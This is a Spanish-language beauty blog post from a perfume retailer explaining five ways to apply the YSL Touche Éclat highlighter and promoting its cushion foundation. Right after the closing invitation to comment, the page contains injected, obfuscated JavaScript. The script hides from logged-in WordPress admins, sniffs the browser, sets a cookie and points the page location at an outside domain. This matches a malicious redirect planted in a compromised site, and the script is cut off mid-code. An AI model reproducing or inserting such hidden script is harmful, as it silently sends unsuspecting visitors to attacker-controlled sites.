Como si se tratase de magia, los iluminadores tienen el poder de potenciar las facciones de tu rostro, la nariz se afina, la piel gana jugosidad, los pómulos se elevan y los labios ganan volumen… ¡Y es que el maquillaje es un arte e iluminar es lo que te hace conseguir ese resultado profesional que estás buscando! Sigue leyendo este post si quieres conocer cómo sacarle partido a uno de iluminadores más icónicos del mercado con los consejos de Perfumerías Tin Tin.

Touche Éclat iluminador YSL BEAUTY
¡Posee la luz! Touche Éclat de Yves Saint Laurent cumple 25 años, es un corrector mágico que aporta una gran luminosidad en tu piel. Es material y herramienta, pincel y luz reunidos en un único tesoro.
Los iluminadores líquidos como Touche Éclat se pueden aplicar con la yema del dedo o con la esponjita de maquillaje o brocha que utilices para aplicar tu fondo de maquillaje. ¡El iluminador va encima!
¿Qué zonas debes iluminar? Debajo del arco de las cejas, el hueso de la nariz, la parte alta de los pómulos, el arco de cupido, la frente… ¡Existen hasta 25 maneras de aplicar Touche Éclat! Y hoy en Perfumerías Tin Tin os queremos enseñar nuestras 5 formas favoritas de usarlo:

      1. Realzar los labios: es tan fácil como trazar una línea en el arco de cupido.

    1. Iluminar los pómulos: con 2 sencillos trazos en la parte más alta del pómulo consigues esculpir el rostro en segundos.

    1. Contornear la nariz: consigue la apariencia de una nariz más delgada y estilizada con 3 toques de luz.

    1. Potenciar tus cejas: las cejas son el marco de la mirada, consigue potenciarlas con 2 puntos de luz.

    1. Esculpir el mentón: un solo trazo curvo para conseguir definición en el mentón y dar más dimensión a tu rostro.

Coincidiendo con este aniversario, Touche Éclat se reinventa para convertirse en la primera base de maquillaje en formato cushion de Yves Saint Laurent con la que puedes conseguir en un instante una hidratación refrescante, cobertura perfecta y un acabado mate luminoso. Para lucir una piel  natural y cómoda durante todo el día. ¡Encuentra tus imprescindibles de belleza YSL en Perfumerías Tin Tin!

Touche eclat cushion Yves Saint Laurent

¿Haz probado Touche Éclat y te encanta? Cuéntanos tu experiencia y trucos en los comentarios. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone